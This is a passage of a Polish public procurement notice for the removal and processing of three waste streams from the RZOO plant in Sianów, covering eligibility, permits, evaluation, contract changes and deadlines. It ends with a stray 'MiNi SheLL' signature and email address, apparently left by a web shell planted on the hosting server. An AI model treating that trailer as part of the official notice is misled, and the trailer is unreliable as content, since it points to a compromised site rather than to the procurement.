przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena najniższa<br/>C = --------------------------- x 100 pkt <br/> Cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu na podstawie:<br/>1.1) art. 108 ust. 1 i 109 ust. 1 pkt 4 ustawy PZP; <br/>1.2) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r., poz. 507) oraz art. 5k rozporządzenia Rady (UE) nr 833/2014 <br/>z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 229 z 31.7.2014, str.1), w brzmieniu nadanym rozporządzeniem Rady (UE) 2022/576 z dnia 8 kwietnia 2022 r. w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 111 z 8.4.2022, str.1) i późniejszymi zmianami;<br/>b) spełniają warunki udziału w postępowaniu dotyczące:<br/>1.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada:<br/>dotyczy Zadania Nr 1<br/>1.1) aktualny wpis do rejestru BDO w zakresie transportu i zagospodarowania odpadów <br/>w procesie R12 i o kodzie 17 09 04; <br/>dotyczy Zadania Nr 2<br/>1.2) aktualny wpis do rejestru BDO w zakresie transportu i zagospodarowania odpadów <br/>w procesie D5 lub R1 i o kodzie 19 05 99;<br/>dotyczy Zadania Nr 3<br/>1.3) aktualny wpis do rejestru BDO w zakresie transportu i zagospodarowania odpadów <br/>w procesie R1 lub R12 i o kodzie 19 12 12;<br/><br/>Uwaga – dotyczy ppkt 1.1) – ppkt 1.3)<br/>Zamawiający wskazuje, że uzna warunek udziału w postępowaniu, o którym mowa w ppkt 1.1) – 1.3) za spełniony, jeżeli Wykonawca wykaże, że złożył wniosek o aktualizację wpisu do BDO <br/>w wymaganym zakresie najpóźniej w dniu poprzedzającym publikację ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <br/><br/>dotyczy Zadania Nr 1<br/>2.1) aktualną decyzję na prowadzenie działalności w zakresie przetwarzania w ramach odzysku <br/>w procesie R12 odpadów o kodzie 17 09 04 zgodnie z ustawą z dnia 14 grudnia 2012 r. <br/>o odpadach dla instalacji docelowej i ewentualnej instalacji pośredniej; <br/>dotyczy Zadania Nr 2<br/>2.2) aktualną decyzję na prowadzenie działalności w zakresie przetwarzania w ramach odzysku <br/>w procesie D5 lub R12 odpadów o kodzie 19 05 99 zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach dla instalacji docelowej i ewentualnej instalacji pośredniej;<br/>dotyczy Zadania Nr 3<br/>2.3) aktualną decyzję na prowadzenie działalności w zakresie przetwarzania w ramach odzysku <br/>w procesie R1 lub R12 odpadów o kodzie 19 12 12 zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach dla instalacji docelowej i ewentualnej instalacji pośredniej;<br/><br/>Uwaga – dotyczy ppkt 2.1) – ppkt 2.3)<br/>W przypadku braku aktualnej decyzji na prowadzenie działalności w zakresie przetwarzania <br/>w ramach odzysku lub recyklingu lub unieszkodliwiania odpadów Zamawiający wskazuje, że uzna warunek udziału w postępowaniu, o którym mowa w ppkt 2.1) – 2.3) za spełniony, jeżeli Wykonawca przedłoży <br/>ww. decyzję i złoży oświadczenie, że spełnia wymagania nałożone ustawą z dnia 20 lipca 2018 r. o zmianie ustawy o odpadach oraz niektórych innych ustaw (Dz. U. 2018, poz. 1592) oraz ustawą z dnia 19 lipca 2019 r. o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw (Dz.U. 2019 poz. 1579) i w związku z tym przedłożył do 5.03.2020 r. wniosek w zakresie gospodarowania odpadami, zgodny z wymaganiami ww. Ustawy.<br/><br/>Zamawiający wskazuje, że uzna warunek udziału w postępowaniu, o którym mowa w ppkt 2.1) – 2.3) <br/>za spełniony, jeżeli Wykonawca w terminie nie później niż trzy miesiące przed upływem ważności decyzji złoży wniosek o wydanie nowego zezwolenia na przetwarzanie odpadów. Zgodnie z art. 226a ust. 1 ustawy o odpadach do dnia 31 grudnia 2025 r. zezwolenie na zbieranie odpadów lub zezwolenie na przetwarzanie odpadów nie wygasa ze względu na upływ czasu, na jaki zostało wydane, jeżeli posiadacz odpadów <br/>w terminie nie później niż trzy miesiące przed upływem tego czasu złoży wniosek o wydanie nowego zezwolenia na zbieranie odpadów lub zezwolenia na przetwarzanie odpadów.<br/><br/><br/>2.1)	zdolności technicznej lub zawodowej:<br/>2.2.1) Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat, licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/><br/>dotyczy Zadania Nr 1<br/>2.2.1.1) co najmniej jedną usługę polegającą na wykonaniu odbioru i zagospodarowaniu odpadów o kodzie 17 09 04 o wielkości minimum 150 Mg rocznie;<br/>dotyczy Zadania Nr 2<br/>2.2.1.2) co najmniej jedną usługę polegającą na wykonaniu odbioru i zagospodarowaniu odpadów o kodzie 19 05 99 o wielkości minimum 700 Mg rocznie;<br/>dotyczy Zadania Nr 3<br/>2.2.1.3) co najmniej jedną usługę polegającą na wykonaniu odbioru i zagospodarowaniu odpadów o kodzie 19 12 12 o wielkości minimum 500 Mg rocznie;<br/><br/><br/>Uwaga – dotyczy ppkt 2.2.1.1) – ppkt 2.2.1.3)<br/>Zamawiający dopuszcza, aby Wykonawca w celu wykazania spełniania warunku udziału <br/>w postępowaniu, o którym mowa w ppkt 2.2.1.1) – 2.2.1.3) wykazał się wykonaniem więcej niż jednej usługi każda o wielkości mniejszej niż wymagane przez Zamawiającego minimum, ale łączna wielkość usług polegających na wykonaniu odbioru i zagospodarowaniu odpadów musi spełniać warunek określony przez Zamawiającego. <br/><br/>dotyczy Zadania Nr 1 – Nr 3<br/>2.2.2) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje odpowiednim transportem (minimum jednym samochodem) spełniającym wymagania Zamawiającego, tj. waga pojazdu wjeżdżającego (pusty pojazd do załadunku) na teren Regionalnego Zakładu Odzysku Odpadów w Sianowie nie może przekraczać 20 Mg oraz odległość pomiędzy skrajnymi osiami pojazdu nie może przekraczać długości 17,5 m.<br/><br/>Uwaga – dotyczy ppkt 2.2.2) dla Zadania Nr 1 – Nr 3<br/>W przypadku, gdy Wykonawca składa ofertę na więcej niż jedno Zadanie może w celu wykazania spełniania warunku udziału w postępowaniu, o którym mowa w ppkt 2.2.2) wykazać ten sam samochód. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki<br/>dowodowe wymagane od wykonawcy, o których mowa zostały określone w rozdziale I SWZ &#34; Instrukcja dla Wykonawców w punkcie<br/>8.A. 8.A.1.Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów, z innym Wykonawcą, który<br/>złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub<br/>wniosku o opuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej -<br/>Załącznik nr 3 do SWZ; 8.A.2. Oświadczenie składane na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - Załącznik nr 4 do<br/>SWZ;8.A.3. Oświadczenie dotyczące zakazu udziału rosyjskich podmiotów w zamówieniach publicznych dotyczące środków<br/>ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie - załącznik nr 5 do SWZ; 8.A.4. Odpis lub<br/>informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109<br/>ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji; UWAGA ! Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentu, o którym mowa w pkt. 8.A.4., składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest<br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przedjego złożeniem. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o<br/>których mowa w pkt. 8.A.4., zastępuje je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć złożone<br/>pod przysięgą, lub jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych usług -Załącznik nr 6 do SWZ.<br/>Wykaz potencjału technicznego -Załącznik nr 7 do SWZ.<br/>Zadanie nr 1 aktualny wpis do rejestru BDO w zakresie transportu i zagospodarowania odpadów w procesie R12 i o kodzie 17 09 04; Zadania Nr 2 - aktualny wpis do rejestru BDO w zakresie transportu i zagospodarowania odpadów w procesie D5 lub R1 i o kodzie 19 05 99; Zadania Nr 3 aktualny wpis do rejestru BDO w zakresie transportu i zagospodarowania odpadów <br/>w procesie R1 lub R12 i o kodzie 19 12 12;Uwaga Zamawiający wskazuje, że uzna warunek udziału w postępowaniu, o którym mowa w ppkt 1.1) – 1.3) Rozdział I SWZ &#34; Instrukcja dla Wykonawców&#34; za spełniony, jeżeli Wykonawca wykaże, że złożył wniosek o aktualizację wpisu do BDO <br/>w wymaganym zakresie najpóźniej w dniu poprzedzającym publikację ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <br/><br/>Zadania Nr 1 - aktualną decyzję na prowadzenie działalności w zakresie przetwarzania w ramach odzysku w procesie R12 odpadów o kodzie 17 09 04 zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach dla instalacji docelowej i ewentualnej instalacji pośredniej; Zadania Nr 2 - aktualną decyzję na prowadzenie działalności w zakresie przetwarzania w ramach odzysku w procesie D5 lub R12 odpadów o kodzie 19 05 99 zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach dla instalacji docelowej i ewentualnej instalacji pośredniej; Zadania Nr 3 - aktualną decyzję na prowadzenie działalności w zakresie przetwarzania w ramach odzysku w procesie R1 lub R12 odpadów o kodzie 19 12 12 zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach dla instalacji docelowej i ewentualnej instalacji pośredniej;<br/><br/>Uwaga – W przypadku braku aktualnej decyzji na prowadzenie działalności w zakresie przetwarzania w ramach odzysku lub recyklingu lub unieszkodliwiania odpadów Zamawiający wskazuje, że uzna warunek udziału w postępowaniu, za spełniony, jeżeli Wykonawca przedłoży <br/>ww. decyzję i złoży oświadczenie, że spełnia wymagania nałożone ustawą z dnia 20 lipca 2018 r. o zmianie ustawy o odpadach oraz niektórych innych ustaw (Dz. U. 2018, poz. 1592) oraz ustawą z dnia 19 lipca 2019 r. o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw (Dz.U. 2019 poz. 1579) i w związku z tym przedłożył do 5.03.2020 r. wniosek w zakresie gospodarowania odpadami, zgodny z wymaganiami ww. Ustawy.Zamawiający wskazuje, że uzna warunek udziału w postępowaniu, o którym mowa w ppkt 2.1) – 2.3) Rozdziału I SWZ &#34;Instrukcji dla wykonawców&#34; za spełniony, jeżeli Wykonawca w terminie nie później niż trzy miesiące przed upływem ważności decyzji złoży wniosek o wydanie nowego zezwolenia na przetwarzanie odpadów. Zgodnie z art. 226a ust. 1 ustawy o odpadach do dnia 31 grudnia 2025 r. zezwolenie na zbieranie odpadów lub zezwolenie na przetwarzanie odpadów nie wygasa ze względu na upływ czasu, na jaki zostało wydane, jeżeli posiadacz odpadów <br/>w terminie nie później niż trzy miesiące przed upływem tego czasu złoży wniosek o wydanie nowego zezwolenia na zbieranie odpadów lub zezwolenia na przetwarzanie odpadów.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W punkcie 10 Rozdziału I SWZ -&#34; Instrukcja dla wykonawców &#34; zostały określone Informacje dla Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. 10.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy.10.2. pełnomocnictwo, o którym mowa w pkt.1 należy dołączyć do oferty.10.3. Wszelką korespondencję w<br/>postępowaniu zamawiający kieruje do pełnomocnika.10.4. Sposób składania dokumentów przez wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia został określony w punktach 8; 12.18.2;, 18.1. oraz 18.3. Rozdział I<br/>SWZ.10.5.Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich<br/>zastosowanie zasady określone w pkt 1 – 4.10.6. Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia będą mieli obowiązek przedstawić zamawiającemu kopię umowy regulującej współpracę tych wykonawców,<br/>zawierającą, co najmniej: 1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim<br/>zakresem realizację przedmiotu zamówienia,2) określenie zakresu działania poszczególnych stron umowy, 3) czas<br/>obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia.10.7. W przypadku, o<br/>którym mowa w art. 117 ust. 4 ustawy wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały określone w Rozdziale III SWZ &#34;Wzór umowy&#34; w § 10<br/>1.	Zmiana umowy wymaga formy pisemnej pod rygorem nieważności.<br/>2.	Zmiana umowy jest możliwa w przypadku: 1)	zmiany terminu realizacji umowy z przyczyn niezależnych od Wykonawcy, 2)	zmiany osób upoważnionych do realizacji umowy wskazanych w § 5, 3)	zmian w obowiązujących przepisach prawa lub wytycznych mających wpływ na wykonanie zamówienia, 4)	ograniczenia zakresu przedmiotu umowy, w przypadku zaistnienia okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz ze związanym z tym obniżeniem wynagrodzenia – z zastrzeżeniem § 1 ust. 9, 5)	wystąpienia klęski żywiołowej lub gdy warunki atmosferyczne lub inne obiektywne okoliczności uniemożliwiają wykonanie przedmiotu umowy, 6)	zmiany terminu wykonania usługi w przypadku jego zdezaktualizowania na skutek przedłużenia postępowania o zamówienie publiczne, 7)	zmiany podwykonawcy pod warunkiem wskazanym w § 2 ust. 2 pkt 6, 8)	zmiany, w tym dodania instalacji pod warunkiem wskazanym w § 2 ust. 2 pkt 7. 3.	Zmiany objęte ust. 2 mogą być zainicjowane przez Wykonawcę lub Zamawiającego poprzez pisemne żądanie skierowane do drugiej ze stron. W żądaniu winna zostać wskazana przyczyna zmian, jej uzasadnienie, a także szczegółowy zakres zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-22 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1171974</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-22 13:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.9.	Zamawiający wymaga, zgodnie z art. 95 ust. 1 ustawy PZP, zatrudnienia <br/>przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks Pracy <br/>(t.j. Dz. U. z 2023 r. poz. 1465, z 2024 r. poz. 878, 1222) osób wykonujących czynności w zakresie realizacji zamówienia : pracowników wykonujących czynności transportu odpadów i bezpośrednio związane z przetwarzaniem i odzyskiem odpadów. <br/>2.10.	Zamawiający dopuszcza możliwość ograniczenia zakresu zamówienia w postaci części usług stanowiącej 50% wartości realizacji całego zamówienia, przy czym minimalna wartość lub wielkość świadczenia wynosi 50%. <br/>Wymagania dotyczące zabezpieczenie należytego wykonania umowy - dotyczy zadania <br/>nr 1 -zadania nr 3 . <br/>18.A.1. Zamawiający wymaga od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy.<br/>18.A.2. Kwota zabezpieczenia wynosi 1,0 % ceny całkowitej podanej w ofercie.<br/>18.A.3. Zabezpieczenie należytego wykonania umowy można wnieść w formie przewidzianej <br/>w art. 450 ustawy Prawo zamówień publicznych.<br/>18.A.4.	Zabezpieczenie należytego wykonania Umowy wniesione w pieniądzu winno być przekazane na rachunek: PKO BP S.A. nr 79 1020 2791 0000 7402 0289 7726 z dopiskiem: <br/>„Odbiór i zagospodarowanie odpadów w 2025 roku w podziale na 3 zadania: Zadanie 1: odbiór <br/>i zagospodarowanie odpadów o kodzie 17 09 04 – z RZOO w Sianowie, przy ul. Łubuszan 80, Zadanie 2: odbiór i zagospodarowanie odpadów o kodzie 19 05 99 – z RZOO w Sianowie przy ul. Łubuszan 80, Zadanie 3: odbiór i zagospodarowanie odpadów o kodzie 19 12 12 – z RZOO w Sianowie <br/>przy ul. Łubuszan 80&#34;. <br/>18.A.5.Cel zabezpieczenia oraz zasady jego wnoszenia, przechowywania, zmiany formy oraz zwrotu określają art. 449-453 ustawy Prawo zamówień publicznych.<br/> 18.A.6. Zabezpieczenie gwarantujące zgodnie z umową wykonanie przedmiotu zamówienia zostanie <br/> zwrócone w ciągu 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie <br/> wykonane.

Creat By MiNi SheLL
Email: jattceo@gmail.com